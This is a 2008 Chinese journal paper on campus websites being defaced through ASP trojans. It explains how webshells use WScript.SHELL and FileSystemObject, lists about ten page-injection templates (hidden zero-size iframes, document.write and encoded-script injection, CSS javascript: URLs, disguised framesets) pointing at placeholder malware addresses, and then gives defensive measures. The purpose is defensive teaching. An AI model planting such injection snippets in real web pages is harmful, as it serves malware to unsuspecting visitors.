校園網(wǎng)頁被篡改的研究與防范

摘要：如何解決不法黑客的惡意攻擊，如何保證校園網(wǎng)頁不被篡改，防止自身形象受到損失，以及如何解決由此帶來的其它多方面的問題，已經(jīng)成為信息技術(shù)的一個前沿課題。

關(guān)鍵詞：網(wǎng)頁篡改；ASP木馬；FSO組件

中圖分類號：TP393文獻標識碼：A文章編號：1009-3044(2008)34-1952-02

Campus Website has been Tampered with the Research and Prevention

ZHANG Ling， LIU Sheng-zhen， YANG Xiao-hua

(Shangqiu Medical College， Shangqiu 476100， China)

Abstract: how to solve the illegal malicious hackers to attack， how to ensure that the school's website will not be tampered with to prevent the loss of self-image and how to solve the resulting wide range of other issues， Information technology has become a cutting-edge issues.

Key words: page tampering; ASP horse; FSO components

1 引言

在社會信息化飛速發(fā)展的今天，計算機網(wǎng)絡(luò)已經(jīng)成為高校工作和生活的一部分，高校開始通過網(wǎng)絡(luò)發(fā)布校園新聞、通知公告、招生查詢和校園辦公等等。而越來越多的高校為了適應(yīng)社會的發(fā)展，樹立自身良好的形象，擴大自身在社會的影響，都已經(jīng)在Internet中建立起自己的網(wǎng)站。這些網(wǎng)站往往代表高校的形象，但網(wǎng)站卻常常成為黑客攻擊的首選對象。黑客通過各種手段攻擊網(wǎng)頁的漏洞，從而獲取、破壞、篡改各種重要信息，給各高校造成重大的經(jīng)濟損失和惡劣的社會影。如何解決不法黑客的惡意攻擊，如何保證網(wǎng)站頁面不被篡改，防止自身形象受到損失，以及如何解決由此帶來的其它多方面的問題，已經(jīng)成為信息技術(shù)的一個前沿課題。

2 什么是ASP木馬

它其實就是用ASP編寫的網(wǎng)站程序，甚至有些ASP木馬就是由ASP網(wǎng)站管理程序修改而來的。和其它ASP程序沒有本質(zhì)區(qū)別，只要能運行ASP的服務(wù)器就能運行它，這種性質(zhì)使得ASP木馬非常不易被發(fā)覺。和其它ASP程序的區(qū)別在于ASP木馬是入侵者上傳到目標空間，并幫助入侵者控制目標空間的ASP程序。要想禁止ASP木馬運行就等于禁止ASP的運行，顯然這是行不通的，這也是為什么ASP木馬猖獗的原因。

3 入侵原理

首先分析如下代碼：

Set o script = Server.CreateObject(\"W script .SHELL\") \"建立了一個名為o script的W script.SHELL對象，用于命令的執(zhí)行\(zhòng)"

Set o script Net = Server.CreateObject(\"W script .NETWORK\")

Set oFileSys = Server.CreateObject(\"script ing.FileSystemObject\")

ASP木馬主要是通過以上3個組件運行，第一個是FSO組件，需要FSO支持也就是\" script ing.FileSystemObject\"項的支持，是不是刪除這個組件就可以了，不可以的，因為現(xiàn)在很多程序都是要用到FSO這個組件的，所以不能限制，不然正常的程序也運行不了。第二個是“shell.application”和“Wscript.SHELL”等危險組件。一般的木馬都是要使用這幾個組件的，即使你把FSO組件限制的話，你不去限制其它組件，一樣不能起到防范的效果，對于FSO組件之外的其它的幾個組件，我們平時用的很少，所以我們可以直接在注冊表中的HKEY_CLASSES_ROOT中找到，找到“shell.application”、“W script.SHELL”等危險的腳本對象（因為它們都是用于創(chuàng)建腳本命令的通道）進行改名或刪除，也就是限制系統(tǒng)對“腳本SHELL”的創(chuàng)建，ASP木馬也就成為無本之木、無米之炊，運行不起來。要想入侵，就要將ASP木馬上傳到目標服務(wù)器，這點很重要， 那么入侵者如何上傳ASP木馬呢？入侵者多是利用服務(wù)器中已有的具有上傳功能的ASP程序來實現(xiàn)的。正常情況下，這些可以上傳文件的ASP程序都是有權(quán)限限制的，大多也限制了ASP文件的上傳。（比如：可以上傳圖片新聞、圖片管理程序、及可以上傳更多類型文件的論壇程序等）但由于存在人為的ASP設(shè)置錯誤及ASP程序本身的漏洞，給了入侵者可乘之機，實現(xiàn)上傳ASP木馬。只要ASP木馬上傳到目標服務(wù)器，入侵者就可以運行它，完成對目標服務(wù)器的控制。

4 幾個常見的掛馬實例

1) 框架掛馬

＜iframe src=“地址” width=0 height=0＞＜/iframe＞

2) js文件掛馬

首先將以下代碼

document.write(\"＜iframe width='0' height='0' src='地址'＞＜/iframe＞\")

保存為xxx.js， 則JS掛馬代碼為

＜script language=javascript src=xxx.js＞＜/script＞

3) js變形加密

＜SCRIPT language=\"JScript.Encode\" src=地址＞＜/script＞

4) body掛馬

＜body ＞＜/body＞

5) 隱蔽掛馬

top.document.body.innerHTML=op.document.body.innerHTML+'\\r\

＜iframe src=\"地址\"＞＜/iframe＞';

6) css中掛馬

body

{

background-image:url('javascript:document.write(\"＜script src=地址＞＜/script＞\")')

}

7) 圖片偽裝

＜html＞

＜iframe src=\"網(wǎng)馬地址\" height=0 width=0＞＜/iframe＞

＜img src=\"圖片地址\"＞＜/center＞

＜/html＞

9) 偽裝調(diào)用

＜frameset rows=\"444，0\" cols=\"*\"＞

＜frame src=\"打開網(wǎng)頁\" framborder=\"no\" scrolling=\"auto\" noresize marginwidth=\"0\"margingheight=\"0\"＞

＜frame src=\"網(wǎng)馬地址\" frameborder=\"no\" scrolling=\"no\" noresize marginwidth=\"0\"margingheight=\"0\"＞

＜/frameset＞

10) 高級欺騙

＜a href=\"地址\" ＞頁面要顯示的內(nèi)容＜/a＞

＜SCRIPT Language=\"JavaScript\"＞

function wang ()

{

var url=\"網(wǎng)馬地址\";

open(url，\"NewWindow\"，\"toolbar=no，location=no，directories=no，status=no，menubar=no，scrollbars=no，

resizable=no，copyhistory=yes，width=800，height=600，left=10，top=10\")

}

5 防范措施

首先大家可以根據(jù)下面的安全級別，評估一下自己網(wǎng)站被ASP木馬入侵的風險度。

網(wǎng)站中沒有任何上傳程序和論壇程序——非常安全；

網(wǎng)站中有上傳程序或論壇程序，只有管理員可以上傳，并對程序數(shù)據(jù)庫做了保護措施——一般安全；

網(wǎng)站中有上傳程序或論壇程序，有許多用戶可以上傳程序，對程序數(shù)據(jù)庫沒有做保護措施——非常危險。

這個安全級別只是讓大家對學校服務(wù)器的安全有一個初步認識，接下來我們要說說具體的防范措施了。

1) 我們建議學校通過ftp來上傳、維護網(wǎng)頁，盡量不安裝ASP的上傳程序。

2) 對ASP上傳程序的調(diào)用一定要進行身份認證，并只允許信任的人使用上傳程序。可以在不需要上傳時將實現(xiàn)上傳的ASP文件改名或刪除，如upload.ASP、upfile.ASP等，然后在需要使用時再通過ftp恢復(fù)原名或重新上傳。

3) ASP程序管理員的用戶名和密碼要有一定復(fù)雜性，不能過于簡單，還要注意定期更換。

4) 到正規(guī)網(wǎng)站下載ASP程序，下載后要對其數(shù)據(jù)庫名稱和存放路徑進行修改，數(shù)據(jù)庫文件名稱也要有一定復(fù)雜性。建議學校使用.mdb的數(shù)據(jù)庫文件擴展名，因為學校服務(wù)器設(shè)置了.mdb文件防下載功能。

5) 要盡量保持程序是最新版本。

6) 不要在網(wǎng)頁上加注后臺管理程序登陸頁面的鏈接。

7) 為防止程序有未知漏洞，可以在維護后刪除后臺管理程序的登陸頁面，下次維護時再通過ftp上傳即可。

8) 要時常備份數(shù)據(jù)庫等重要文件。

9) 日常要多維護，并注意服務(wù)器中是否有來歷不明的ASP文件。尤其是用來專門存放上傳文件的目錄，如：uploadfile、uploadsoft等。如果發(fā)現(xiàn)不明的*.ASP或*.exe文件應(yīng)該立即刪除，因為這些文件有90%的可能是入侵程序。

10) 一旦發(fā)現(xiàn)被入侵，除非學校自己能識別出所有木馬文件，否則要刪除所有文件。重新上傳文件前，所有ASP程序用戶名和密碼都要重置，并要重新修改程序數(shù)據(jù)庫名稱和存放路徑以及后臺管理程序的路徑。

11) 安裝入侵檢測系統(tǒng)，及時更新殺毒軟件。

6 結(jié)束語

總之，防范ASP木馬的重點就在于如何確保學校服務(wù)器中ASP上傳程序的安全。只要大家能按照上述幾種防范措施操作，我們的網(wǎng)頁就能得到安全保護，從而大大降低網(wǎng)頁被篡改的可能性。

參考文獻：

[1] 石志國.計算機網(wǎng)絡(luò)安全教程[M].北京:北京交通大學出版社，2004.

[2] 張軍.ASP動態(tài)網(wǎng)站設(shè)計經(jīng)典案例[M].北京:機械工業(yè)出版社，2005.

[3] 童愛紅.ASP動態(tài)網(wǎng)頁設(shè)計實用教材[M].北京:清華大學出版社，2007.